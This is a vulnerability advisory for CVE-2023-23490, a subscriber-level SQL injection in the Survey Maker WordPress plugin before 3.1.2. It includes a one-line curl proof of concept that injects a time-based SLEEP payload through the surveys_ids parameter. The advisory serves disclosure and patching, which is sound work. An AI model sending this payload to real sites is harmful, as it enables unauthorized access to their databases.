Survey Maker < 3.1.2 – Subscriber+ SQLi | CVE 2023-23490 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the surveys_ids parameter before using it in a SQL statement via the ays_surveys_export_json AJAX action , leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

curl "https://example.com/wp-admin/admin-ajax.php" --header "subscriber+" --data "action=ays_surveys_export_json&surveys_ids[0]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(3)))a)--+-"

Affects Plugins

Fixed in 3.1.2

References

CVE

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable)

Verified

No

WPVDB ID

47156cc4-7e83-4d96-abb0-bc3cde709850

Timeline

Publicly Published

2023-01-12 (about 3 years ago)

Added

2023-01-20 (about 3 years ago)

Last Updated

2023-01-20 (about 3 years ago)

Other

Published

Title

Published

2025-03-26

Title

FlexStock < 3.13.2 - Authenticated (Administrator+) SQL Injection

Published

2021-02-08

Title

Pricing Table by Supsystic < 1.8.9 - Authenticated SQL Injections

Published

2024-12-02

Title

NEX-Forms – Ultimate Form Builder < 8.7.9 - Authenticated (Administrator+) SQL Injection

Published

2023-02-06

Title

GigPress <= 2.3.28 - Subscriber+ SQLi

Published

2025-05-01

Title

Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager < 4.89 - Unauthenticated SQL Injection